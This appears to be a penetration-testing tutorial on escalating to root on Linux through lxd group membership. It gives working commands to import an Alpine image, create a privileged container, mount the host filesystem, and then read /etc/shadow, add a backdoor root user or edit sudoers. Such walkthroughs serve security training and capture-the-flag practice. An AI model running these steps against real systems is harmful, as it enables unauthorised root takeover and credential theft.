Linux Privilege Escalation with LXD Group?
Prerequisite :
If the low-privileged user that we got a shell with is a part of the lxd group of the Victim system, we can do this trick to escalate the privilege to root.
Attack OverView :
Being a part of the lxd group means the user can deal with containers on the system. This group gives user the ability to start and control a container. So what we can do is, download and build a linux image in the Victim Machine. If the victim machine can’t connect to the internet, we can just download and build the image in our Attack Machine and then transfer it to the Victim Machine. Then we will initialize and start a container with the image, as we are creating the container, we can be the root user inside the container. Then we mount the “/” directory or the root directory of the victim machine to the container. And as we are the super privileged root user in the container, we can navigate and perform tasks on the original root directory. While doing that, we can even create a backdoor user with full root privilege on the Victim Machine and access with it later.
STEP 1 : Create and Build a Container and transfer it to Victim
Let’s git clone the repository of saghul/lxd-alpine-builder on the Attack Machine.
Then do a ./build-alpine to actually build the image. After the process completes, we will get a .tar.gz built image. If you are having errors doing this (errors about mirror file) check this open issue and just follow the steps. It will fix and build the image.
Now let’s transfer the tar.gz file to the victim machine using python3 http server. Do python3 -m http.server 80 on Attack Machine to host a server. and wget it from the victim machine to a directory that you can write in.
STEP 2 : Initialize lxd & import container image
Now we do lxd init on the victim machine to start lxd and press enter to all the prompts that will pop up. It will initialize the lxd system. Now we import the image in lxd that we have just got transferred from the Attack Machine with lxc image import ./image_name — alias privesc . This command is importing the image and setting up an alias (short name) for the image so that we can use it easily. Then we can do lxc image list to confirm that it’s been imported.
STEP 3 : Create a container with the image and get root on it
As we have imported the image in our container, now we have to actually create the container using that image with the command lxc init <image_name> <container_name> -c security.privileged=true . The last part of the command is actually setting up the privilege properly for us so that we can act like a root not only in the container but also in the Victim Machine file system. If we don’t set the security privileged to true, we will still be a root user in the container but whenever we get out of the container, but outside the container context we will still have a low privileged user id. That’s why we can’t perform any operation on the root filesystem or create a backdoor root user. So we do lxc privesc privesc-container -c security.privileged=true and the container is created. We can confirm that with lxc list and see a list with our container there.
STEP 4 : Mount the / Directory of Victim Machine to the Container’s /mnt
Now we have to mount the whole filesystem of Victim Machine which is the / Directory to any directory of the container (/mnt for this walkthrough). So that being root inside the container we can browse the whole file system of the Victim Machine and perform anything that we want.
lxc config device add privesc-container privdevice disk source=/ path=/mnt/root recursive=true . With this command, we are creating a “disk” type device named privdevice and we are mounting the whole / directory of the Victim Machine to the /mnt/root directory of the Container.
STEP 5 : Start and Enter the Container to Control everything
Do lxc start privesc-container to start the container and confirm it with lxc list . Now we get into the container with lxc exec privesc-container /bin/sh and start a sh shell to have an interactive shell. We can do id to see that we are root.
STEP 6 : Get into the Victim Machine File System & conquer !
First navigate to the /mnt/root directory because that is where the Victim Machine file system is mounted. Then be creative. You can view the /etc/shadow file to get the password hashes and crack them to be root. Or you can add a new user with the same privileges of root. Or you can change the sudoers file and give all sudo permissions to the user that you have access to. Whatever manipulation we are performing, it will apply to the actual Victim Machine and we can privilege escalate from that.
You got root. Get a good sleep now :3
